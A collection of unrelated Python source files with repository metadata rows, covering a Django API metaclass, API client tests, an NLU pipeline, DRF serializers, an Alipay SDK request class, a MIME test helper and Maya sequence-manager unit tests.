from simple_api.django_object.utils import get_pk_field
from simple_api.object.object import Object, ObjectMeta
from simple_api.object.registry import object_storage
from simple_api.django_object.registry import model_django_object_storage
from simple_api.utils import ClassStub
class DjangoObjectMeta(type):
base_class = "simple_api.django_object.django_object.DjangoObject"
def __new__(mcs, name, bases, attrs, **kwargs):
cls = super().__new__(mcs, name, bases, attrs)
if kwargs.get("skip", False) or object_storage.key_for_class(attrs["__module__"], name) == mcs.base_class:
return cls
object_stub = ClassStub(name=cls.__name__, bases=(Object,))
# set the module of the generated Object class to match the module of the user class
object_stub.add_attr("__module__", cls.__module__)
assert cls.model is not None, "`model` must be set."
# if the class is meant to resolve relations, store it for the particular model
if cls.class_for_related:
model_django_object_storage.store(cls.model, cls)
cls.pk_field_name, cls.pk_field = get_pk_field(cls.model)
object_stub.add_attr("pk_field", cls.pk_field_name)
# make sure the primary key is included, otherwise `ModelObjectAction`s would just not work
if cls.only_fields and cls.pk_field_name not in cls.only_fields:
cls.only_fields = cls.only_fields + (cls.pk_field_name,)
elif cls.exclude_fields and cls.pk_field_name in cls.exclude_fields:
cls.exclude_fields = (f for f in cls.exclude_fields if f != cls.pk_field_name)
fields, input_fields, output_fields, field_validators = determine_simple_api_fields(
cls.model,
cls.only_fields, cls.exclude_fields,
cls.custom_fields, cls.input_custom_fields, cls.output_custom_fields,
)
for f in input_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.in_fields = {**fields, **input_fields}
for f in output_fields:
assert f not in fields, "Redefinition of `{}` field.".format(f)
cls.out_fields = {**fields, **output_fields}
object_stub.add_attr("fields", fields)
object_stub.add_attr("input_fields", input_fields)
object_stub.add_attr("output_fields", output_fields)
# create filters and List type for potential listing actions
cls.filter_type = ObjectMeta("{}Filters".format(cls.__name__), (Object,), {"fields": generate_filters(cls)})
object_stub.add_attr("filter_type", cls.filter_type)
create_associated_list_type(cls)
actions = {}
if cls.detail_action is not None:
actions["detail"] = deepcopy(cls.detail_action)
if cls.list_action is not None:
actions["list"] = deepcopy(cls.list_action)
if cls.create_action is not None:
actions["create"] = deepcopy(cls.create_action)
if cls.update_action is not None:
actions["update"] = deepcopy(cls.update_action)
if cls.delete_action is not None:
actions["delete"] = deepcopy(cls.delete_action)
actions.update(cls.custom_actions)
converted_actions = {}
for action_name, action in actions.items():
action.set_parent_class(cls)
action.set_name(action_name)
converted_actions[action_name] = action.to_action()
object_stub.add_attr("actions", converted_actions)
if cls.field_difficulty_scores is not None:
object_stub.add_attr("field_difficulty_scores", cls.field_difficulty_scores)
cls._object = object_stub.build(ObjectMeta)
return cls
class DjangoObject(metaclass=DjangoObjectMeta):
model = None
auto_pk = True
class_for_related = True
only_fields = None
exclude_fields = None
custom_fields = {}
input_custom_fields = {}
output_custom_fields = {}
field_difficulty_scores = {}
detail_action = DetailAction()
list_action = ListAction()
create_action = CreateAction()
update_action = UpdateAction()
delete_action = DeleteAction()
custom_actions = {}
@classmethod
def to_object(cls):
return cls._object
| 39.347458 | 116 | 0.697825 | [
"MIT"
] | ladal1/simple_api | simple_api/django_object/django_object.py | 4,643 | Python |
import json
import pytest
import requests_mock
from apitist.constructor import converter
from tests.data import _list, _status_true, _test_run_result
from qaseio.client.models import (
TestRunResultCreate,
TestRunResultCreated,
TestRunResultFilters,
TestRunResultInfo,
TestRunResultList,
TestRunResultStatus,
TestRunResultUpdate,
)
@pytest.mark.parametrize(
"params, query",
[
(
(
10,
30,
TestRunResultFilters(status=[TestRunResultStatus.FAILED]),
),
"?limit=10&offset=30&filters%5Bstatus%5D=failed",
),
((None, 30, None), "?offset=30"),
((10, None, None), "?limit=10"),
(
(
None,
None,
TestRunResultFilters(status=[TestRunResultStatus.FAILED]),
),
"?filters%5Bstatus%5D=failed",
),
],
)
def test_get_all_test_run_results(client, params, query):
response = _status_true(_list(_test_run_result()))
with requests_mock.Mocker() as m:
m.get(client._path("result/CODE"), json=response)
data = client.results.get_all("CODE", *params)
assert data == converter.structure(
response.get("result"), TestRunResultList
)
res = client.results._last_res
assert res.url == client._path("result/CODE" + query)
def test_get_specific_test_run_result(client):
response = _status_true(_test_run_result())
with requests_mock.Mocker() as m:
m.get(client._path("result/CODE/6efce6e4"), json=response)
data = client.results.get("CODE", "6efce6e4")
assert data == converter.structure(
response.get("result"), TestRunResultInfo
)
res = client.results._last_res
assert res.url == client._path("result/CODE/6efce6e4")
def test_create_new_test_run_result(client):
response = _status_true({"hash": "6efce6e4"})
with requests_mock.Mocker() as m:
m.post(client._path("result/CODE/123"), json=response)
create_data = TestRunResultCreate(123, TestRunResultStatus.BLOCKED)
data = client.results.create("CODE", 123, create_data)
assert data == converter.structure(
response.get("result"), TestRunResultCreated
)
res = client.results._last_res
assert json.loads(res.request.body) == converter.unstructure(
create_data
)
def test_update_test_run_result(client):
response = _status_true({"hash": "6efce6e4"})
with requests_mock.Mocker() as m:
m.patch(client._path("result/CODE/123/6efce6e4"), json=response)
update_data = TestRunResultUpdate(TestRunResultStatus.BLOCKED)
data = client.results.update("CODE", 123, "6efce6e4", update_data)
assert data == converter.structure(
response.get("result"), TestRunResultCreated
)
res = client.results._last_res
assert res.url == client._path("result/CODE/123/6efce6e4")
assert json.loads(res.request.body) == converter.unstructure(
update_data
)
def test_delete_test_run_result(client):
with requests_mock.Mocker() as m:
m.delete(
client._path("result/CODE/123/6efce6e4"), json={"status": True}
)
data = client.results.delete("CODE", 123, "6efce6e4")
assert data is None
res = client.results._last_res
assert res.url == client._path("result/CODE/123/6efce6e4")
| 33 | 75 | 0.629283 | [
"Apache-2.0"
] | 1ivliev/qase-python | qaseio/tests/qaseio/services/test_test_run_result.py | 3,531 | Python |
from typing import Text, Any, Dict, List, Union
from blinker import NamedSignal, signal
import rx
from rx import operators as ops
from dataclasses import dataclass
from sagas.nlu.pipes import pred_cond, filter_path, to_token
from sagas.util.collection_util import wrap, to_obj
import logging
logger = logging.getLogger(__name__)
cat_sig=signal('cat')
@cat_sig.connect
def cat_proc(sender, **kwargs):
from sagas.nlu.utils import predicate
from sagas.nlu.translator import trans_axis
results=[]
source = rx.of(*kwargs['rs'])
lang = kwargs['lang']
cond:pred_cond=kwargs['data']
logger.debug(f"pred pos: {cond}")
kind=cond.cond
logger.debug(f"lang: {lang}, cond: {cond}")
source.pipe(
filter_path(cond.part),
ops.map(lambda t: to_obj({'word': t.text if t.upos.lower() in ['adj'] else t.lemma, **t})),
ops.map(lambda t: to_obj({'trans': trans_axis(t.word, lang, t.upos), **t})),
ops.filter(lambda t: predicate(kind, t.trans, 'en', '*')),
ops.map(lambda t: {'path':t.path,
'word': t.word,
'trans': t.trans,
'cat': kind,
'value': kind,
'pos': t.upos.lower()}),
).subscribe(
on_next=lambda value: results.append({**value}),
on_error=lambda e: logger.error(e),
)
logger.debug(f"result: {results}")
return results
| 31.042553 | 99 | 0.59767 | [
"Apache-2.0"
] | samlet/stack | sagas/nlu/pipes/cat.py | 1,459 | Python |
""" A class that can provide a date/time in any timeformat.format() format and both
local and UTC timezones within a ContextVariable.
Copyright (c) 2004 Colin Stewart (http://www.owlfish.com/)
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
If you make any bug fixes or feature enhancements please let me know!
"""
import re, time, math, string
import timeformat
from simpletal import simpleTALES
PATHREGEX = re.compile ('^((?:local)|(?:utc))/?(.*)$')
class Date (simpleTALES.ContextVariable):
""" Wraps a DateTime and provides context paths local and utc.
These paths in turn can take TimeFormat formats, for example:
utc/%d-%m-%Y
"""
def __init__ (self, value = None, defaultFormat = '%a[SHORT], %d %b[SHORT] %Y %H:%M:%S %Z'):
""" The value should be in the LOCAL timezone.
"""
self.ourValue = value
self.defaultFormat = defaultFormat
def value (self, currentPath=None):
# Default to local timezone and RFC822 format
utcTime = 0
strFrmt = self.defaultFormat
if (currentPath is not None):
index, paths = currentPath
currentPath = '/'.join (paths[index:])
match = PATHREGEX.match (currentPath)
if (match is not None):
type = match.group(1)
if (type == 'local'):
utcTime = 0
else:
utcTime = 1
strFrmt = match.group(2)
if (strFrmt == ""):
strFrmt = self.defaultFormat
if (self.ourValue is None):
# Default to the current time!
timeValue = time.localtime()
else:
timeValue = self.ourValue
if (utcTime):
# Convert to UTC (GMT)
timeValue = time.gmtime (time.mktime (timeValue))
value = timeformat.format (strFrmt, timeValue, utctime=utcTime)
raise simpleTALES.ContextVariable (value)
| 38.417722 | 93 | 0.730478 | [
"BSD-3-Clause"
] | owlfish/pubtal | lib/pubtal/DateContext.py | 3,035 | Python |
import pandas as pd
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d
base = pd.read_csv('orchard.csv')
figura = plt.figure()
eixo = figura.add_subplot(1, 1, 1, projection = '3d')
eixo.scatter(base.decrease, base.rowpos, base.colpos)
eixo.set_xlabel('decrease')
eixo.set_ylabel('rowpos')
eixo.set_zlabel('colpos')
# cores
# https://pythonspot.com/3d-scatterplot/ | 25.8 | 53 | 0.75969 | [
"MIT"
] | filipeaguiarrod/Formacao-Cientista-de-Dados-com-Python-e-R | Python/grafico_3d.py | 387 | Python |
from rest_framework import serializers
from core.models import Tag, Ingredient, Recipe
class TagSerializer(serializers.ModelSerializer):
"""Seraizlizer for TAG object"""
class Meta:
model = Tag
fields = ('id', 'name')
read_only_fields = ('id',)
class IngredientSerializer(serializers.ModelSerializer):
"""Seraializer for Ingredient object"""
class Meta:
model = Ingredient
fields = ('id', 'name')
read_only_fields = ('id',)
class RecipeSerializer(serializers.ModelSerializer):
"""Recipe serailizer"""
ingredients = serializers.PrimaryKeyRelatedField(
many=True,
queryset=Ingredient.objects.all()
)
tags = serializers.PrimaryKeyRelatedField(
many=True,
queryset=Tag.objects.all()
)
class Meta:
model = Recipe
fields = ('id', 'title', 'ingredients', 'tags',
'time_minutes', 'price', 'link')
read_only_fields = ('id',)
class RecipeDetailSerializer(RecipeSerializer):
"""Serializer a recipe detail"""
ingredients = IngredientSerializer(many=True, read_only=True)
tags = TagSerializer(many=True, read_only=True)
class RecipeImageSerializer(serializers.ModelSerializer):
"""Serializer for uploading images to recipes"""
class Meta:
model = Recipe
fields = ('id', 'image')
read_only_fields = ('id',)
| 26.690909 | 66 | 0.623297 | [
"MIT"
] | mgx259/mgx_recipe | app/recipe/serializers.py | 1,468 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.FileItem import FileItem
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayEbppInvoiceApplyStatusNotifyModel import AlipayEbppInvoiceApplyStatusNotifyModel
class AlipayEbppInvoiceApplyStatusNotifyRequest(object):
def __init__(self, biz_model=None):
self._biz_model = biz_model
self._biz_content = None
self._version = "1.0"
self._terminal_type = None
self._terminal_info = None
self._prod_code = None
self._notify_url = None
self._return_url = None
self._udf_params = None
self._need_encrypt = False
@property
def biz_model(self):
return self._biz_model
@biz_model.setter
def biz_model(self, value):
self._biz_model = value
@property
def biz_content(self):
return self._biz_content
@biz_content.setter
def biz_content(self, value):
if isinstance(value, AlipayEbppInvoiceApplyStatusNotifyModel):
self._biz_content = value
else:
self._biz_content = AlipayEbppInvoiceApplyStatusNotifyModel.from_alipay_dict(value)
@property
def version(self):
return self._version
@version.setter
def version(self, value):
self._version = value
@property
def terminal_type(self):
return self._terminal_type
@terminal_type.setter
def terminal_type(self, value):
self._terminal_type = value
@property
def terminal_info(self):
return self._terminal_info
@terminal_info.setter
def terminal_info(self, value):
self._terminal_info = value
@property
def prod_code(self):
return self._prod_code
@prod_code.setter
def prod_code(self, value):
self._prod_code = value
@property
def notify_url(self):
return self._notify_url
@notify_url.setter
def notify_url(self, value):
self._notify_url = value
@property
def return_url(self):
return self._return_url
@return_url.setter
def return_url(self, value):
self._return_url = value
@property
def udf_params(self):
return self._udf_params
@udf_params.setter
def udf_params(self, value):
if not isinstance(value, dict):
return
self._udf_params = value
@property
def need_encrypt(self):
return self._need_encrypt
@need_encrypt.setter
def need_encrypt(self, value):
self._need_encrypt = value
def add_other_text_param(self, key, value):
if not self.udf_params:
self.udf_params = dict()
self.udf_params[key] = value
def get_params(self):
params = dict()
params[P_METHOD] = 'alipay.ebpp.invoice.apply.status.notify'
params[P_VERSION] = self.version
if self.biz_model:
params[P_BIZ_CONTENT] = json.dumps(obj=self.biz_model.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
if self.biz_content:
if hasattr(self.biz_content, 'to_alipay_dict'):
params['biz_content'] = json.dumps(obj=self.biz_content.to_alipay_dict(), ensure_ascii=False, sort_keys=True, separators=(',', ':'))
else:
params['biz_content'] = self.biz_content
if self.terminal_type:
params['terminal_type'] = self.terminal_type
if self.terminal_info:
params['terminal_info'] = self.terminal_info
if self.prod_code:
params['prod_code'] = self.prod_code
if self.notify_url:
params['notify_url'] = self.notify_url
if self.return_url:
params['return_url'] = self.return_url
if self.udf_params:
params.update(self.udf_params)
return params
def get_multipart_params(self):
multipart_params = dict()
return multipart_params
| 27.613793 | 148 | 0.647353 | [
"Apache-2.0"
] | Anning01/alipay-sdk-python-all | alipay/aop/api/request/AlipayEbppInvoiceApplyStatusNotifyRequest.py | 4,004 | Python |
from re import search
from base64 import b64decode
from email.message import Message
class mimetest:
def __init__(self, mime):
self.mime = mime
assert not mime.defects
def __getitem__(self, header):
return self.mime[header]
@property
def transfer_encoding(self):
return self['Content-Transfer-Encoding']
@property
def encoding(self):
return self.mime.get_content_charset(None)
@property
def mimetype(self):
return self.mime.get_content_type()
@property
def payload(self):
payload = self.mime.get_payload().encode(self.encoding or 'ascii')
if self.transfer_encoding == 'base64':
return b64decode(payload)
return payload
@property
def parts(self):
payload = self.mime.get_payload()
if not isinstance(payload, list):
raise TypeError
return [mimetest(k) for k in payload]
def blank():
return Message()
| 22.790698 | 74 | 0.642857 | [
"MIT"
] | eugene-eeo/mailthon | tests/mimetest.py | 980 | Python |
# -*- coding: utf-8 -*-
import unittest
import os
# prepare for test
os.environ['ANIMA_TEST_SETUP'] = ""
from anima.env import mayaEnv # to setup maya extensions
import pymel.core
from anima.edit import Sequence, Media, Video, Track, Clip, File
class SequenceManagerTestCase(unittest.TestCase):
"""tests the SequenceManagerExtension class
"""
def setUp(self):
"""set up the test
"""
# create a new scene and get the sequenceManager in the scene
pymel.core.newFile(force=True)
self.sm = pymel.core.PyNode('sequenceManager1')
def test_from_xml_path_argument_skipped(self):
"""testing if a TypeError will be raised when the path argument is
skipped
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(TypeError) as cm:
sm.from_xml()
self.assertEqual(
cm.exception.message,
'from_xml() takes exactly 2 arguments (1 given)'
)
def test_from_xml_path_argument_is_not_a_string(self):
"""testing if a TypeError will be raised when the path argument is not
a string
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(TypeError) as cm:
sm.from_xml(30)
self.assertEqual(
cm.exception.message,
'path argument in SequenceManager.from_xml should be a string, '
'not int'
)
def test_from_xml_path_argument_is_not_a_valid_path(self):
"""testing if a IOError will be raised when the path argument is not
a valid path
"""
sm = pymel.core.PyNode('sequenceManager1')
with self.assertRaises(IOError) as cm:
sm.from_xml('not a valid path')
self.assertEqual(
cm.exception.message,
'Please supply a valid path to an XML file!'
)
def test_from_xml_generates_correct_sequencer_hierarchy(self):
"""testing if from_xml method will generate Sequences and shots
correctly
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.from_xml(path)
sequences = sm.sequences.get()
self.assertEqual(len(sequences), 1)
sequencer = sequences[0]
self.assertIsInstance(sequencer, pymel.core.nt.Sequencer)
self.assertEqual(sequencer.duration, 111)
self.assertEqual(sequencer.sequence_name.get(), 'SEQ001_HSNI_003')
# check scene fps
self.assertEqual(pymel.core.currentUnit(q=1, t=1), 'film')
# check timecode
time = pymel.core.PyNode('time1')
self.assertEqual(time.timecodeProductionStart.get(), 0.0)
shots = sequencer.shots.get()
self.assertEqual(len(shots), 3)
shot1 = shots[0]
shot2 = shots[1]
shot3 = shots[2]
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1024, shot1.wResolution.get())
self.assertEqual(778, shot1.hResolution.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(34.0, shot1.sequenceEndFrame.get())
self.assertEqual(34.0, shot1.duration)
self.assertEqual(10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0010_v001.mov',
shot1.output.get()
)
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1024, shot2.wResolution.get())
self.assertEqual(778, shot2.hResolution.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(35.0, shot2.sequenceStartFrame.get())
self.assertEqual(65.0, shot2.sequenceEndFrame.get())
self.assertEqual(31.0, shot2.duration)
self.assertEqual(10.0, shot2.startFrame.get())
self.assertEqual(40.0, shot2.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0020_v001.mov',
shot2.output.get()
)
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1024, shot3.wResolution.get())
self.assertEqual(778, shot3.hResolution.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(66.0, shot3.sequenceStartFrame.get())
self.assertEqual(111.0, shot3.sequenceEndFrame.get())
self.assertEqual(46.0, shot3.duration)
self.assertEqual(10.0, shot3.startFrame.get())
self.assertEqual(55.0, shot3.endFrame.get())
self.assertEqual(
'/tmp/SEQ001_HSNI_003_0030_v001.mov',
shot3.output.get()
)
def test_from_xml_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
"""testing if from_xml method will update Sequences and shots
correctly with the xml file
"""
path = os.path.abspath('./test_data/test_v002.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_xml(path)
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(75.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(64.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(76.0, shot3.sequenceStartFrame.get())
self.assertEqual(131.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(120.0, shot3.endFrame.get())
def test_from_edl_updates_sequencer_hierarchy_with_shots_expanded_and_contracted(self):
"""testing if from_edl method will update Sequences and shots
correctly with the edl file
"""
path = os.path.abspath('./test_data/test_v002.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_edl(path)
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(76.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(65.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(77.0, shot3.sequenceStartFrame.get())
self.assertEqual(133.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(121.0, shot3.endFrame.get())
def test_from_edl_updates_sequencer_hierarchy_with_shots_used_more_than_one_times(self):
"""testing if from_edl method will update Sequences and shots correctly
with shot are used more than once
"""
path = os.path.abspath('./test_data/test_v004.edl')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
# set a camera for shot4
shot3.set_camera('persp')
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_edl(path)
# check if there are 4 shots
self.assertEqual(4, len(seq.shots.get()))
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
self.assertEqual('0020', shot2.shotName.get())
self.assertEqual(1, shot2.track.get())
self.assertEqual(55.0, shot2.sequenceStartFrame.get())
self.assertEqual(76.0, shot2.sequenceEndFrame.get())
self.assertEqual(44.0, shot2.startFrame.get())
self.assertEqual(65.0, shot2.endFrame.get())
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(77.0, shot3.sequenceStartFrame.get())
self.assertEqual(133.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(121.0, shot3.endFrame.get())
# Clip4
# there should be an extra shot
shot4 = seq.shots.get()[-1]
self.assertEqual('0030', shot4.shotName.get())
self.assertEqual(1, shot4.track.get())
self.assertEqual(133.0, shot4.sequenceStartFrame.get())
self.assertEqual(189.0, shot4.sequenceEndFrame.get())
self.assertEqual(65.0, shot4.startFrame.get())
self.assertEqual(121.0, shot4.endFrame.get())
# check if their cameras also the same
self.assertEqual(
shot3.get_camera(),
shot4.get_camera()
)
def test_from_xml_updates_sequencer_hierarchy_with_shots_removed(self):
"""testing if from_xml method will update Sequences and shots
correctly with the xml file
"""
path = os.path.abspath('./test_data/test_v003.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_version('v001')
seq = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
# now update it with test_v002.xml
sm.from_xml(path)
# we should have 2 shots only
self.assertEqual(2, len(seq.shots.get()))
# check shot data
self.assertEqual('0010', shot1.shotName.get())
self.assertEqual(1, shot1.track.get())
self.assertEqual(1.0, shot1.sequenceStartFrame.get())
self.assertEqual(54.0, shot1.sequenceEndFrame.get())
self.assertEqual(-10.0, shot1.startFrame.get())
self.assertEqual(43.0, shot1.endFrame.get())
# Clip2
# removed
# Clip3
self.assertEqual('0030', shot3.shotName.get())
self.assertEqual(1, shot3.track.get())
self.assertEqual(55.0, shot3.sequenceStartFrame.get())
self.assertEqual(110.0, shot3.sequenceEndFrame.get())
self.assertEqual(65.0, shot3.startFrame.get())
self.assertEqual(120.0, shot3.endFrame.get())
def test_to_xml_will_generate_proper_xml_string(self):
"""testing if a proper xml compatible string will be generated with
to_xml() method
"""
path = os.path.abspath('./test_data/test_v001.xml')
sm = pymel.core.PyNode('sequenceManager1')
sm.set_shot_name_template('<Sequence>_<Shot>_<Version>')
sm.set_version('v001')
seq1 = sm.create_sequence('SEQ001_HSNI_003')
shot1 = seq1.create_shot('0010')
shot1.startFrame.set(0)
shot1.endFrame.set(33)
shot1.sequenceStartFrame.set(1)
shot1.output.set('/tmp/SEQ001_HSNI_003_0010_v001.mov')
shot1.handle.set(10)
shot1.track.set(1)
shot2 = seq1.create_shot('0020')
shot2.startFrame.set(34)
shot2.endFrame.set(64)
shot2.sequenceStartFrame.set(35)
shot2.output.set('/tmp/SEQ001_HSNI_003_0020_v001.mov')
shot2.handle.set(10)
shot2.track.set(1)
shot3 = seq1.create_shot('0030')
shot3.startFrame.set(65)
shot3.endFrame.set(110)
shot3.sequenceStartFrame.set(66)
shot3.output.set('/tmp/SEQ001_HSNI_003_0030_v001.mov')
shot3.handle.set(10)
shot3.track.set(1)
self.assertEqual(shot1.track.get(), 1)
self.assertEqual(shot2.track.get(), 1)
self.assertEqual(shot3.track.get(), 1)
result = sm.to_xml()
with open(path) as f:
expected = f.read()
self.maxDiff = None
self.assertEqual(expected, result)
def test_create_sequence_is_working_properly(self):
"""testing if create_sequence is working properly
"""
seq = self.sm.create_sequence()
self.assertEqual(seq.type(), 'sequencer')
self.maxDiff = None
self.assertEqual(self.sm, seq.message.connections()[0])
def test_create_sequence_is_properly_setting_the_sequence_name(self):
"""testing if create_sequence is working properly
"""
seq = self.sm.create_sequence('Test Sequence')
self.assertEqual(
'Test Sequence',
seq.sequence_name.get()
)
def test_to_edl_is_working_properly(self):
"""testing if to_edl method is working properly
"""
import edl
# create a sequence
seq1 = self.sm.create_sequence('sequence1')
seq1.create_shot('shot1')
seq1.create_shot('shot2')
seq1.create_shot('shot3')
l = self.sm.to_edl()
self.assertIsInstance(
l,
edl.List
)
